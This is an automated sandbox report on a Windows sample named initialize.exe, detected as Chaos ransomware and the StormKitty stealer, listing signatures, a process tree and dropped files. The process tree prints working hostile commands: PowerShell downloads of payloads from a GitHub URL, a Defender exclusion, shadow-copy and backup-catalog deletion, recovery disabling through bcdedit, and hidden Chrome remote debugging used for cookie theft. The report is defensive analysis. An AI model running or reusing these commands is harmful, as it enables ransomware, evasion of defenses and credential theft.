Analysis

  • max time kernel
    80s
  • max time network
    82s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250314-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
  • submitted
    25/03/2025, 23:04

General

  • Target

    initialize.exe

  • Size

    57KB

  • MD5

    f40b4d5dc143233298f0a5e78dd68a0f

  • SHA1

    87d23f60239c692e96ce5375ada123bbc3ebccc0

  • SHA256

    9e13904bbfb3b36110a58fc9f339fc82957e5c938c79bd87d9bcbbf04dcd65f7

  • SHA512

    0b8ab10ea18812a688b940946ddeeb9de83889a53a27efc6906c22735e72bcf98df6350e460f6090f043360b96b8349b9337ab3c9510a6f5b6fae2d0e1726f4b

  • SSDEEP

    1536:6rPJVKjbcknWSOYvTfkWkFM79yQVuuSCRc:6LJMjbcHDdMwQ7

Malware Config

Signatures

  • Chaos

    Ransomware family first seen in June 2021.

  • Chaos Ransomware 2 IoCs
  • Chaos family
  • StormKitty

    StormKitty is an open source info stealer written in C#.

  • StormKitty payload 2 IoCs
  • Stormkitty family
  • Deletes shadow copies 3 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
  • Blocklisted process makes network request 4 IoCs
  • Deletes backup catalog 3 TTPs 1 IoCs

    Uses wbadmin.exe to inhibit system recovery.

  • Disables Task Manager via registry modification
  • Downloads MZ/PE file 2 IoCs
  • Uses browser remote debugging 2 TTPs 5 IoCs

    Can be used control the browser and steal sensitive information such as credentials and session cookies.

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 3 IoCs
  • Executes dropped EXE 3 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Using powershell.exe command.

  • Drops desktop.ini file(s) 64 IoCs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Hide Artifacts: Ignore Process Interrupts 1 TTPs 2 IoCs

    Command interpreters often include specific commands/flags that ignore errors and other hangups.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

  • Checks SCSI registry key(s) 3 TTPs 4 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Interacts with shadow copies 3 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Modifies registry class 1 IoCs
  • Opens file in notepad (likely ransom note) 1 IoCs
  • Runs net.exe
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 63 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\initialize.exe
    "C:\Users\Admin\AppData\Local\Temp\initialize.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3088
    • C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\6503.tmp\6504.tmp\6505.bat C:\Users\Admin\AppData\Local\Temp\initialize.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:100
      • C:\Windows\system32\net.exe
        net session
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2476
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 session
          4⤵
            PID:5560
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -NoProfile -ExecutionPolicy Bypass -Command "Set-MpPreference -ExclusionPath \"$env:TEMP\" -ErrorAction SilentlyContinue"
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Hide Artifacts: Ignore Process Interrupts
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3352
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -NoProfile -ExecutionPolicy Bypass -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; iwr -Uri \"https://github.com/nfdsafnsdl/login/releases/download/V1/build.exe\" -OutFile \"C:\Users\Admin\AppData\Local\Temp\build.exe\" -ErrorAction Stop"
          3⤵
          • Blocklisted process makes network request
          • Downloads MZ/PE file
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1924
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -NoProfile -ExecutionPolicy Bypass -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; iwr -Uri \"https://github.com/nfdsafnsdl/login/releases/download/V1/kernelv.exe\" -OutFile \"C:\Users\Admin\AppData\Local\Temp\kernelv.exe\" -ErrorAction Stop"
          3⤵
          • Blocklisted process makes network request
          • Downloads MZ/PE file
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2040
        • C:\Users\Admin\AppData\Local\Temp\build.exe
          "C:\Users\Admin\AppData\Local\Temp\build.exe"
          3⤵
          • Checks computer location settings
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:4312
          • C:\Users\Admin\AppData\Roaming\svchost.exe
            "C:\Users\Admin\AppData\Roaming\svchost.exe"
            4⤵
            • Checks computer location settings
            • Drops startup file
            • Executes dropped EXE
            • Drops desktop.ini file(s)
            • Sets desktop wallpaper using registry
            • Modifies registry class
            • Suspicious behavior: AddClipboardFormatListener
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:5252
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" /C vssadmin delete shadows /all /quiet & wmic shadowcopy delete
              5⤵
                PID:5316
                • C:\Windows\system32\vssadmin.exe
                  vssadmin delete shadows /all /quiet
                  6⤵
                  • Interacts with shadow copies
                  PID:5796
                • C:\Windows\System32\Wbem\WMIC.exe
                  wmic shadowcopy delete
                  6⤵
                  • Suspicious use of AdjustPrivilegeToken
                  PID:3344
              • C:\Windows\System32\cmd.exe
                "C:\Windows\System32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no
                5⤵
                  PID:4372
                  • C:\Windows\system32\bcdedit.exe
                    bcdedit /set {default} bootstatuspolicy ignoreallfailures
                    6⤵
                    • Modifies boot configuration data using bcdedit
                    PID:4820
                  • C:\Windows\system32\bcdedit.exe
                    bcdedit /set {default} recoveryenabled no
                    6⤵
                    • Modifies boot configuration data using bcdedit
                    PID:4048
                • C:\Windows\System32\cmd.exe
                  "C:\Windows\System32\cmd.exe" /C wbadmin delete catalog -quiet
                  5⤵
                    PID:3448
                    • C:\Windows\system32\wbadmin.exe
                      wbadmin delete catalog -quiet
                      6⤵
                      • Deletes backup catalog
                      PID:1736
                  • C:\Windows\system32\NOTEPAD.EXE
                    "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Roaming\readme.txt
                    5⤵
                    • Opens file in notepad (likely ransom note)
                    PID:4000
              • C:\Users\Admin\AppData\Local\Temp\kernelv.exe
                "C:\Users\Admin\AppData\Local\Temp\kernelv.exe"
                3⤵
                • Executes dropped EXE
                • Accesses Microsoft Outlook profiles
                • System Location Discovery: System Language Discovery
                • Checks processor information in registry
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                • outlook_office_path
                • outlook_win_path
                PID:5240
                • C:\Windows\SysWOW64\cmd.exe
                  "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
                  4⤵
                  • System Location Discovery: System Language Discovery
                  • System Network Configuration Discovery: Wi-Fi Discovery
                  • Suspicious use of WriteProcessMemory
                  PID:5440
                  • C:\Windows\SysWOW64\chcp.com
                    chcp 65001
                    5⤵
                    • System Location Discovery: System Language Discovery
                    PID:6084
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh wlan show profile
                    5⤵
                    • Event Triggered Execution: Netsh Helper DLL
                    • System Location Discovery: System Language Discovery
                    • System Network Configuration Discovery: Wi-Fi Discovery
                    PID:2532
                  • C:\Windows\SysWOW64\findstr.exe
                    findstr All
                    5⤵
                    • System Location Discovery: System Language Discovery
                    PID:3344
                • C:\Windows\SysWOW64\cmd.exe
                  "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
                  4⤵
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of WriteProcessMemory
                  PID:3172
                  • C:\Windows\SysWOW64\chcp.com
                    chcp 65001
                    5⤵
                    • System Location Discovery: System Language Discovery
                    PID:4276
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh wlan show networks mode=bssid
                    5⤵
                    • Event Triggered Execution: Netsh Helper DLL
                    • System Location Discovery: System Language Discovery
                    PID:5864
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default"
                  4⤵
                  • Uses browser remote debugging
                  • Enumerates system info in registry
                  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of FindShellTrayWindow
                  • Suspicious use of WriteProcessMemory
                  PID:5432
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff982f4dcf8,0x7ff982f4dd04,0x7ff982f4dd10
                    5⤵
                      PID:2616
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1948,i,3064417258372859664,16555107134359858517,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=1944 /prefetch:2
                      5⤵
                        PID:4556
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=2256,i,3064417258372859664,16555107134359858517,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2264 /prefetch:3
                        5⤵
                          PID:1932
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2404,i,3064417258372859664,16555107134359858517,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2420 /prefetch:8
                          5⤵
                            PID:5056
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9222 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3264,i,3064417258372859664,16555107134359858517,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3276 /prefetch:1
                            5⤵
                            • Uses browser remote debugging
                            PID:4960
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9222 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3280,i,3064417258372859664,16555107134359858517,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3324 /prefetch:1
                            5⤵
                            • Uses browser remote debugging
                            PID:5060
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9222 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4400,i,3064417258372859664,16555107134359858517,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4432 /prefetch:2
                            5⤵
                            • Uses browser remote debugging
                            PID:1712
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9222 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4792,i,3064417258372859664,16555107134359858517,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4744 /prefetch:1
                            5⤵
                            • Uses browser remote debugging
                            PID:2112
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        powershell -NoProfile -ExecutionPolicy Bypass -Command "Remove-MpPreference -ExclusionPath \"$env:TEMP\" -ErrorAction SilentlyContinue"
                        3⤵
                        • Hide Artifacts: Ignore Process Interrupts
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:3392
                  • C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
                    "C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
                    1⤵
                      PID:4212
                    • C:\Windows\system32\vssvc.exe
                      C:\Windows\system32\vssvc.exe
                      1⤵
                      • Suspicious use of AdjustPrivilegeToken
                      PID:4592
                    • C:\Windows\system32\wbengine.exe
                      "C:\Windows\system32\wbengine.exe"
                      1⤵
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2744
                    • C:\Windows\System32\vdsldr.exe
                      C:\Windows\System32\vdsldr.exe -Embedding
                      1⤵
                        PID:2404
                      • C:\Windows\System32\vds.exe
                        C:\Windows\System32\vds.exe
                        1⤵
                        • Checks SCSI registry key(s)
                        PID:2204

                      Network

                      MITRE ATT&CK Enterprise v15

                      Replay Monitor

                      Loading Replay Monitor...

                      Downloads

                      • C:\Users\Admin\2012_x64_1_vcRuntimeAdditional_x64.log

                        Filesize

                        1B

                        MD5

                        d1457b72c3fb323a2671125aef3eab5d

                        SHA1

                        5bab61eb53176449e25c2c82f172b82cb13ffb9d

                        SHA256

                        8a8de823d5ed3e12746a62ef169bcf372be0ca44f0a1236abc35df05d96928e1

                        SHA512

                        ca63c07ad35d8c9fb0c92d6146759b122d4ec5d3f67ebe2f30ddb69f9e6c9fd3bf31a5e408b08f1d4d9cd68120cced9e57f010bef3cde97653fed5470da7d1a0

                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat

                        Filesize

                        40B

                        MD5

                        0792092a8affb9c9b08c0c6f46dca0e4

                        SHA1

                        0100a83f5b608ee1bd8376d3e2561ac44eec6328

                        SHA256

                        4b4c804b4afd7385d172358f481b45fb5eeeade16251d036555fc4c1abbadfc8

                        SHA512

                        78255472767630ce1e81dc72349c40060bd1bdecf0d970335a0e8e6e6098b282d422280e9a358c52f3dc989ce4bbf326a5e9606910f9739e17ec030334617062

                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ghbmnnjooekpmoecnnnilnnbdlolhkhi\000003.log

                        Filesize

                        87B

                        MD5

                        e4a639b9d8bf7a90cc97bb4e05a36753

                        SHA1

                        676facdabf06e5f014e95218bfc02b8c18c39284

                        SHA256

                        79da0e95b23e5777bee595201fead887021d71ddaffa79dac8d5cf03a646b8cd

                        SHA512

                        4a254245e0af42a2a86647ed24301f4f82a72c0dedad67df32317c2acdb8a7f2e5db8336871611419776e6a1cc1c35933cc5f4cb16648b51b6a401a14087d104

                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

                        Filesize

                        2B

                        MD5

                        d751713988987e9331980363e24189ce

                        SHA1

                        97d170e1550eee4afc0af065b78cda302a97674c

                        SHA256

                        4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

                        SHA512

                        b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\Database\000003.log

                        Filesize

                        3KB

                        MD5

                        3deff2115c244393f48286c8312544e7

                        SHA1

                        88da256ad8261deaf9282ff12da3d524bf8ada18

                        SHA256

                        42c6b86d66a73580caa81c07e77af42a66fa8f0ae143d560b4d02a96630f343e

                        SHA512

                        c02393d655916e58c94ceec3337e259dd8e01f2e5026d562f3233f66a976820b890d708144185a8dcff44b9c0bb380b3b737b677f9e9601de79d4f9d219c0af5

                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Session Storage\000003.log

                        Filesize

                        289B

                        MD5

                        541c42f1c98b3e1b011d22eba854e707

                        SHA1

                        db30188de1f22e3077e7044be1386a5d0ecaed9d

                        SHA256

                        0768e811c51ac61a8e573ac6b53f89dbb1d89eb2fcf62536a9a5f730329c584b

                        SHA512

                        47828c1b40deb8d37d6ff4fc8f7673fbb59b40e07f54f0fa4121b91941160134c251e20f7f28f7ee5185f3c8aee2b7e95a1bef573bc64c68912016accbe90604

                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\000003.log

                        Filesize

                        17KB

                        MD5

                        8d22ebe4ee550d94296cd501c2ddd30f

                        SHA1

                        fc0f6c01a35b3066318e91e5a24b8b566219b575

                        SHA256

                        e20d253d5c5b81f367d7136d490492bb897fd09a01badd3175224dcb0086d854

                        SHA512

                        456757e548be4e7c961c98bbfc7ee47f88ebe97777b1259d96556ad15ad1d728148f96f1d15f151a52a57bfe8ec66fc3eebaff611e7ad552b6e5448ecd9b1868

                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata\000003.log

                        Filesize

                        1KB

                        MD5

                        ab0e569cb971a426883505886265c313

                        SHA1

                        157ed93c6ac802361683d637813d1ee79229fda5

                        SHA256

                        bce6f214e0c7d691b93ff4b8fe6b3f2239124b344d7251fe38999843223324f3

                        SHA512

                        8ed002cd2acc34d8b5845171ab756be1d7fe4433521ca0bab1022c191276fdd056b1abcbabed96fef9ff84db1c89e0fc696e897aab200c8994f05c8ee42287cc

                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

                        Filesize

                        80KB

                        MD5

                        ae093ec42baff29ede6e29a3f6f68c50

                        SHA1

                        6a2b0a7c71a141f8c56149873215eac4cb9e1a40

                        SHA256

                        1be7d7f8b4d005c5d2e3fa873378cdb2f1c7f59bde917423f8570f150a530af6

                        SHA512

                        7eed45a10e7e1f7be2619be77851f8d53e1c9b95d9be60b10a712dbe35dd2bf5996db36ad6ccd9f366da907c1530a8a23b5ed0b6af0ac9d5471bfb134f0fb8f0

                      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\build.exe.log

                        Filesize

                        226B

                        MD5

                        28d7fcc2b910da5e67ebb99451a5f598

                        SHA1

                        a5bf77a53eda1208f4f37d09d82da0b9915a6747

                        SHA256

                        2391511d0a66ed9f84ae54254f51c09e43be01ad685db80da3201ec880abd49c

                        SHA512

                        2d8eb65cbf04ca506f4ef3b9ae13ccf05ebefab702269ba70ffd1ce9e6c615db0a3ee3ac0e81a06f546fc3250b7b76155dd51241c41b507a441b658c8e761df6

                      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                        Filesize

                        2KB

                        MD5

                        d85ba6ff808d9e5444a4b369f5bc2730

                        SHA1

                        31aa9d96590fff6981b315e0b391b575e4c0804a

                        SHA256

                        84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                        SHA512

                        8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                        Filesize

                        944B

                        MD5

                        454c5c4b128d34aee2eb765f2a9c0aa9

                        SHA1

                        4b6e92db79d964f604fd6b261b3b19ede2aea8a5

                        SHA256

                        e1e65d1697b9ac59805f677cbc8eec623a899b75b1389354f0948ad3c1513772

                        SHA512

                        17b4e146ef4f8862d06ac975204cca9ef9b077420256df92d94409715b18efb4dc63879154c1c234317a169ac63024ed43b5cb52473882dc46c588af089f25d6

                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                        Filesize

                        1KB

                        MD5

                        11a8cafd4ecb05e21bbe976a034345e8

                        SHA1

                        f92000380372fd3aa0c38bbe023aec2336d1cef8

                        SHA256

                        177556ac4812d9eac91b217c1c5a3ab849653cee6ceef4a4afac379004f641d8

                        SHA512

                        d7c7455e1c2b01ff166bedc8f684885b6aa18c46b6cedd34d0aca35fcec97c935b8031fe59edbd894e91d166ce188a8117aae15a5d54445bbb035ae61da74019

                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                        Filesize

                        1KB

                        MD5

                        a59e15fe369c23f4c0514f8459c770de

                        SHA1

                        6b53935d4115ae52d23447759dc963955688bef1

                        SHA256

                        4c5607f14e0117d936eda5fb9d12925e3614ae79ff0ee119444b75134b1c0af6

                        SHA512

                        2ff454c479c5f3c4a843bc427d0600413db48aec7d10e3b15612288dcef43fb8485767d78f1caba95c38d3128371b63d57e2d76d0a0abd5cd5f8c62d5aee46b5

                      • C:\Users\Admin\AppData\Local\Temp\212.102.63.147.zip

                        Filesize

                        435KB

                        MD5

                        9aa75909a886b806642effee1f275aba

                        SHA1

                        6f737c09a7febce207cb513517431109e2ba89e7

                        SHA256

                        ab6214c095f103ddbdb5a0fbe1db07fa2418095e79429c244eebbc14f6e9f35f

                        SHA512

                        5a8fc316cddcc66f5a6fc3617c7b109be2de2117a30a01f9a3bbfd960ab8e169c970ec015e9b616677e80d559b774faa95a14ad205cd0b6e8f82ed7285636786

                      • C:\Users\Admin\AppData\Local\Temp\212.102.63.147\Browsers\Edge\EdgeAutoFill.txt

                        Filesize

                        23B

                        MD5

                        f19d961388cd1c4572942a4f1397d15d

                        SHA1

                        95a89992f4fe50c0a6f4351c3f93c14487087844

                        SHA256

                        052caba139f51903bc4994a3cace4e65c87fd093b6efec8141e4a6c4625e380d

                        SHA512

                        66a82f3216189a50df4ca19194a1eda2989e6635fc115508d9c0b2a33b3345f657a17214c52ed78999eb8a3e571199e70c3ae4854deaa7eb1f380af7f6f8fb09

                      • C:\Users\Admin\AppData\Local\Temp\212.102.63.147\Browsers\Edge\EdgeBookmarks.txt

                        Filesize

                        19B

                        MD5

                        c5b94f01b5b97e31f9cec28fecefe0b1

                        SHA1

                        5a2f650235d6319696f02a10a0393b47dbddcd81

                        SHA256

                        bf9eec15e97a4addb7f3b9a15f2de3b5499428750e3ecf1cbad5e3bad5e00548

                        SHA512

                        8e6a75963a9e613ee3a5fe4032c42898904426c19541ec54404811482ef8aac4f84ff23bd80d72f0d33215dcde7d008fcd4687c79ba35cac5b4240c5ad5b109b

                      • C:\Users\Admin\AppData\Local\Temp\212.102.63.147\Browsers\Edge\EdgeCookies.txt

                        Filesize

                        17B

                        MD5

                        964d5571d9a4fec576fe454162f2e844

                        SHA1

                        6234d1102a5012094dc8818bc045f7890d270905

                        SHA256

                        6cfad5b342f80a79633747ee591775dbf46be34fbc793930e5de9aab7afb9995

                        SHA512

                        402b81b47e62fa0d2b993eb01df725d1f3ec826ed76c0ac17d5ebaed048e6c7556ac2e1b3c0141e2347386cb5c7c74377c37f990ba9b5745f388181153b8a46c

                      • C:\Users\Admin\AppData\Local\Temp\212.102.63.147\Browsers\Edge\EdgeHistory.txt

                        Filesize

                        17B

                        MD5

                        b80546283f231ee762dee4b33b0aa091

                        SHA1

                        ec5a0f5581d8d9e9784f82b77e4e0eb187d78301

                        SHA256

                        188352fe4a40938e0918eed1c4b0ae7266fb13c9de77330e04f192711d15c6f8

                        SHA512

                        df1519614443b80b22a601ca4f1b4119eeaef0715fe913dd327a7c247986cba16cbbd7f55e32ea0557b5e5338897c0f82ac23e91d69836ad280c7f587d863d51

                      • C:\Users\Admin\AppData\Local\Temp\212.102.63.147\Browsers\Edge\EdgePasswords.txt

                        Filesize

                        19B

                        MD5

                        c4efd9a7b61ebf43b608440be5e33369

                        SHA1

                        926418256c277f1b11b575ec6e92ce6a844612f7

                        SHA256

                        ed4280859199da5a8f25c0c6d533d0873460ac63368c14a69bbd863ea4bfb30f

                        SHA512

                        9ea97363868d61d3d51bd3804d638b71ba8dc65260800b3a54051b4725cf08e9d9880a12422a549d94a339c7267e858a7ff5ca9428d64051657134b5c6c20745

                      • C:\Users\Admin\AppData\Local\Temp\212.102.63.147\Browsers\Firefox\FirefoxBookmarks.txt

                        Filesize

                        81B

                        MD5

                        ea511fc534efd031f852fcf490b76104

                        SHA1

                        573e5fa397bc953df5422abbeb1a52bf94f7cf00

                        SHA256

                        e5fe7f327ae62df007bd1117aa7f522dbbcd371ec67953f66d786424cb1d7995

                        SHA512

                        f7d8e575a2332b0fbd491b5e092b7ed6b0942a5165557fcc5d215d873b05103aa6ba01843133871c1c7ac81b10182a15895be49885c98d1a379dd55f88004fae

                      • C:\Users\Admin\AppData\Local\Temp\212.102.63.147\DesktopScreenshot.png

                        Filesize

                        433KB

                        MD5

                        b63ccf12a6a69129c2b7e3884485dac6

                        SHA1

                        913fbc41123c6194cea03e568881916a9758c8e6

                        SHA256

                        0cfdbb34ef9223f7700a35ae6d2106b1071411812bd34b6e7e130d651beeff79

                        SHA512

                        c0edeb0894872f42d0a85bba9921f22966a9bd4ff94d7f24938dac2833bff07bf87358912d2a2d5a0f00d3173fd8c17a0d74f39bd451daa19ca0b6c0c7845546

                      • C:\Users\Admin\AppData\Local\Temp\212.102.63.147\System\Info.txt

                        Filesize

                        355B

                        MD5

                        98aa0d277702515bc3900825bc4eb075

                        SHA1

                        2b5d3457010d009fd27d1b8551a3fc0aca0a549b

                        SHA256

                        7c5b4dcd870dcc842626c61a4790adea370a39af7665c41292bf40ca59a6d968

                        SHA512

                        54e859998dc5bf92d79c67f699287dfe927daf77008af016a007a7c7c7b5e4c7853cf10bea1caa8a770d7595338d9dd5d0d405e1adaacebdd0a94e724f30dd2a

                      • C:\Users\Admin\AppData\Local\Temp\212.102.63.147\System\Process.txt

                        Filesize

                        4KB

                        MD5

                        fdb9fb63f44562e0cdaaa30c74ae480d

                        SHA1

                        d392ff6962d06b968c84fabcb4979027590716d5

                        SHA256

                        d5bb80d0754bbf5a89bc62b9846b2bf1d199cf4c4645f934ac238455bb83b1bd

                        SHA512

                        2fedc1d2003db72054b2a6ab53b7e1d0634974b16c3833bb4bc79f4678e27331d349146cf6927515160028234d25630cabdf6d8630dfd3217d593954ca196072

                      • C:\Users\Admin\AppData\Local\Temp\212.102.63.147\System\Process.txt

                        Filesize

                        5KB

                        MD5

                        5168c2d9ee915353c6c5976058a41fec

                        SHA1

                        c905f2468c1b4e7fd165bb1cc02cac337a7b90f3

                        SHA256

                        176cbf100dcb8455ffd79f4065fcd716ed51cc4a2d60b2f665547e27de58d11b

                        SHA512

